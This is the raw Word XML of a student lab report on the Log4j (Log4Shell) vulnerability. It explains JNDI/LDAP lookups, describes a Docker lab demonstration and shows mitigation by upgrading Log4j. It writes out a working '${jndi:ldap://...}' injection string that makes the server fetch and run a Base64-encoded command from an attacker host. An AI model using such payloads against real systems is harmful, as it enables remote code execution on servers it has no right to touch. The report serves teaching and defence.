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C656" w14:textId="77777777" w:rsidR="00CF1070" w:rsidRDefault="00CF1070" w:rsidP="00CF1070">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Derek McPeak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8A1A5" w14:textId="77777777" w:rsidR="00CF1070" w:rsidRDefault="00CF1070" w:rsidP="00CF1070">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Douglas Lundin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBDE699" w14:textId="77777777" w:rsidR="00CF1070" w:rsidRDefault="00CF1070" w:rsidP="00CF1070">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>CSC245</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39444324" w14:textId="7C036D58" w:rsidR="00CF1070" w:rsidRDefault="00CF1070" w:rsidP="00CF1070">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Project 4 / Task 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761BD118" w14:textId="6ED09B5C" w:rsidR="006D441F" w:rsidRDefault="00D31478" w:rsidP="00CF1070">
      <w:pPr>
        <w:spacing w:before="240" w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">The log4j attack utilizes javas naming and directory API, especially the directory. LDAP (Light-weight directory protocol) and in Apache Log4j, versions previous to 2.15, a feature called JNDI look ups, and arbitrary code execution. The JNDI isn’t meant to execute code but to provide data. The attack provided </w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>${</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>jndi:ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>://192.168.0.15:1389</w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=} calls for the JNDI look up to start listening to the attackers IP, then passes the attack “/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo”. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Which “</w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>dG91Y2ggL3RtcC9wd25lZAo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">” translated from </w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to UTF-8</w:t>
      </w:r>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> is “touch /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00727B27">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is an attack in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> system to create a file in the temp folder called “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pwned</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E51CF8" w14:textId="77777777" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="006D441F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1A4D6786" w14:textId="26892F30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77E3FE0E" w14:textId="77777777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00CE7F81" w14:textId="0CFE3801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11AF39D7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6A3BFA1A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281896AE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45EF02A3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698890C6" w14:textId="77777777" w:rsidR="00263C15" w:rsidRDefault="00874DE8" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Page 1 – Overview of Log4j exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AC9BAE" w14:textId="676A0682" w:rsidR="00263C15" w:rsidRDefault="00874DE8" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Page 3 – Log4j vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A736F0C" w14:textId="3E09C3E2" w:rsidR="00263C15" w:rsidRDefault="00874DE8" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Page 4 </w:t>
      </w:r>
      <w:r w:rsidR="00827D8A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827D8A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Log4j Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AABC21" w14:textId="7683E1C4" w:rsidR="00ED088D" w:rsidRDefault="00F363D2" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Page 5</w:t>
      </w:r>
      <w:r w:rsidR="00263C15">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vulnerable server file directory pre attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCBB436" w14:textId="397BB5B5" w:rsidR="00263C15" w:rsidRDefault="00263C15" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Page 6 – The attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F6A29D" w14:textId="4FFB3AB0" w:rsidR="00263C15" w:rsidRDefault="00263C15" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Page 7 – File added from the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74076194" w14:textId="0BD3DF30" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Page 8 - Reference</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED94263" w14:textId="77777777" w:rsidR="00263C15" w:rsidRPr="00ED088D" w:rsidRDefault="00263C15" w:rsidP="00ED088D">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7129F946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0D330088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65D0D5C5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4D3AA2CC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372E84EF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582CDDEB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5B1D5F2B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69ABC892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232949CE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0309FA25" w14:textId="77777777" w:rsidR="00CF1070" w:rsidRDefault="00CF1070" w:rsidP="006D441F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7041C80C" w14:textId="77777777" w:rsidR="001D1DC1" w:rsidRDefault="001D1DC1" w:rsidP="00E01683">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C8C236" w14:textId="12E82E38" w:rsidR="006D441F" w:rsidRPr="00E01683" w:rsidRDefault="006D441F" w:rsidP="00E01683">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E01683">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Log 4j vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B98AA8A" w14:textId="68DC008B" w:rsidR="00633678" w:rsidRDefault="00B770E8" w:rsidP="00633678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</w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0082244C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00972D96">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Log4j Security Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00972D96">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00972D96">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.23.2022</w:t>
      </w:r>
      <w:r w:rsidR="0082244C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00633678">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0063367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Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0063367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Appender</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0063367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with a data source referencing a JNDI URI which can execute remote code</w:t>
      </w:r>
      <w:r w:rsidR="00633678">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>” upgrading from 2.11.2 (vulnerable ) to 2.17.2 (secure) is the most effective way to mitigate this vulnerability.</w:t>
      </w:r>
      <w:r w:rsidR="003A6E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> In the highlighted portion on the 2</w:t>
      </w:r>
      <w:r w:rsidR="003A6E9A" w:rsidRPr="003A6E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="003A6E9A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> screen shot on page 4 shows the upgraded secure version of Log4Shell running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CF3AB8" w14:textId="0D63ECE1" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="006D441F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="72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987A72" wp14:editId="609E5DF3">
            <wp:extent cx="5553075" cy="16954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2125" w14:textId="3A9B6521" w:rsidR="00B770E8" w:rsidRDefault="00B770E8" w:rsidP="006D441F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="768370E9" w14:textId="77777777" w:rsidR="00B770E8" w:rsidRDefault="00B770E8" w:rsidP="006D441F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0C5D4D" w14:textId="77777777" w:rsidR="006D441F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2EA82438" w14:textId="77777777" w:rsidR="001E317C" w:rsidRDefault="001E317C" w:rsidP="003A6E9A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72454715" w14:textId="77777777" w:rsidR="00E01683" w:rsidRDefault="00E01683" w:rsidP="003A6E9A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8C20E2" w14:textId="77777777" w:rsidR="00972D96" w:rsidRDefault="00972D96" w:rsidP="003A6E9A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0632F107" w14:textId="5B0DC6AF" w:rsidR="006D441F" w:rsidRPr="001E317C" w:rsidRDefault="006D441F" w:rsidP="003A6E9A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E317C">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Log4j Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3534972D" w14:textId="1DE69009" w:rsidR="00F652C3" w:rsidRDefault="00F652C3" w:rsidP="003A6E9A">
      <w:pPr>
        <w:spacing w:line="48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0E796D84" wp14:editId="47C34F7C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>981710</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5343525" cy="2609215"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21448"/>
                <wp:lineTo x="21561" y="21448"/>
                <wp:lineTo x="2156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ab/>
        <w:t xml:space="preserve">In the screen shots </w:t>
      </w:r>
      <w:r w:rsidR="00E43A34">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>below,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will see a pom.xml file showing the version being upgraded, then a second screen shot showing the program running successfully with the mitigation (updated version of the log4Shell) applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872DDE8" w14:textId="5AAED4E7" w:rsidR="00F652C3" w:rsidRDefault="00F652C3" w:rsidP="003A6E9A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B554A9E" w14:textId="1D40A2C1" w:rsidR="006D441F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421C8EA0" w14:textId="51EFB637" w:rsidR="006D441F" w:rsidRPr="00727B27" w:rsidRDefault="006D441F" w:rsidP="006D441F">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB7446D" w14:textId="2EB2E49F" w:rsidR="006D441F" w:rsidRDefault="006D441F" w:rsidP="00D31478">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AE88FD0" w14:textId="73868343" w:rsidR="00D31478" w:rsidRDefault="00D31478"/>
    <w:p w14:paraId="15C9D582" w14:textId="0C6739C6" w:rsidR="00F65324" w:rsidRDefault="00F65324"/>
    <w:p w14:paraId="6795A7D5" w14:textId="77777777" w:rsidR="00972D96" w:rsidRDefault="001E317C" w:rsidP="00E571CB">
      <w:r w:rsidRPr="00B770E8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A648E46" wp14:editId="72F0F027">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>168910</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7375227" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21445"/>
                <wp:lineTo x="21537" y="21445"/>
                <wp:lineTo x="21537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227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BEF86" w14:textId="3668A52E" w:rsidR="00827D8A" w:rsidRPr="003B4893" w:rsidRDefault="00F363D2" w:rsidP="00E571CB">
      <w:r w:rsidRPr="001E317C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerable server file directory pre attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F8073E" w14:textId="77777777" w:rsidR="00F363D2" w:rsidRDefault="00F363D2" w:rsidP="00E571CB"/>
    <w:p w14:paraId="4DE13D00" w14:textId="028DE58C" w:rsidR="00E571CB" w:rsidRDefault="00E571CB" w:rsidP="0060596B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is a screen shot of the vulnerable server that was created in docker and a few commands to show the file directory. Note the three bottom blue lines of text are files in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> folder. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C519EA3" w14:textId="679967BA" w:rsidR="005142CA" w:rsidRDefault="00F652C3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="677E8085" wp14:editId="144F961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7B7C46" w14:textId="4F2B2F40" w:rsidR="005142CA" w:rsidRDefault="005142CA"/>
    <w:p w14:paraId="5CD0AAA8" w14:textId="65D3A22E" w:rsidR="005142CA" w:rsidRDefault="005142CA"/>
    <w:p w14:paraId="08B88B30" w14:textId="2B7E4F09" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="31897C66" w14:textId="446EBEC5" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="06996AEB" w14:textId="77777777" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="1D80E699" w14:textId="77777777" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="31EB8177" w14:textId="77777777" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="4DBF94FA" w14:textId="77777777" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="5AEE3539" w14:textId="77777777" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="6C6637D7" w14:textId="77777777" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="48796013" w14:textId="77777777" w:rsidR="00A93D55" w:rsidRDefault="00A93D55"/>
    <w:p w14:paraId="0CF394E9" w14:textId="77777777" w:rsidR="00827D8A" w:rsidRDefault="00827D8A"/>
    <w:p w14:paraId="09D4E0D9" w14:textId="77777777" w:rsidR="00972D96" w:rsidRDefault="00972D96"/>
    <w:p w14:paraId="3EF0F10E" w14:textId="73547336" w:rsidR="005142CA" w:rsidRDefault="005142CA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF593A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A996F0" w14:textId="77777777" w:rsidR="00ED7E42" w:rsidRPr="00DF593A" w:rsidRDefault="00ED7E42">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1450AA10" w14:textId="77777777" w:rsidR="00D83364" w:rsidRDefault="00A93D55">
      <w:r>
        <w:tab/>
        <w:t>In the cluttered screen shot provided, we see three windows command instances. The top left is showing</w:t>
      </w:r>
      <w:r w:rsidR="007E7FF2">
        <w:t xml:space="preserve"> a curated, vulnerable server running in a docker image. The top right is showing </w:t>
      </w:r>
      <w:r w:rsidR="00D83364">
        <w:t xml:space="preserve">an application running assisting in the attack creating a host server that hosts the attack and the bottom middle is the meat of the attack which delivers the attack. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EE91CB" w14:textId="06881758" w:rsidR="00A93D55" w:rsidRDefault="00D83364">
      <w:r>
        <w:tab/>
        <w:t>Thing to note. Top left window, very bottom states “Received a request for…” this is the server confirming it received the attack. The attack is very simple in nature, adding a file called “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:r w:rsidR="00E23154">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” to a file system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D6B689" w14:textId="7E8B17C3" w:rsidR="005142CA" w:rsidRDefault="005142CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58772329" wp14:editId="3E1ABB1E">
            <wp:extent cx="5943600" cy="333756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FFBD" w14:textId="77777777" w:rsidR="0031476D" w:rsidRDefault="0031476D"/>
    <w:p w14:paraId="0E5F765F" w14:textId="77777777" w:rsidR="0031476D" w:rsidRDefault="0031476D"/>
    <w:p w14:paraId="406A75E0" w14:textId="77777777" w:rsidR="0031476D" w:rsidRDefault="0031476D"/>
    <w:p w14:paraId="5626C783" w14:textId="77777777" w:rsidR="0031476D" w:rsidRDefault="0031476D"/>
    <w:p w14:paraId="09B3D72B" w14:textId="77777777" w:rsidR="0031476D" w:rsidRDefault="0031476D"/>
    <w:p w14:paraId="13B164EF" w14:textId="77777777" w:rsidR="0031476D" w:rsidRDefault="0031476D"/>
    <w:p w14:paraId="36F62475" w14:textId="77777777" w:rsidR="0031476D" w:rsidRDefault="0031476D"/>
    <w:p w14:paraId="7F28243C" w14:textId="77777777" w:rsidR="007E6DF9" w:rsidRDefault="007E6DF9"/>
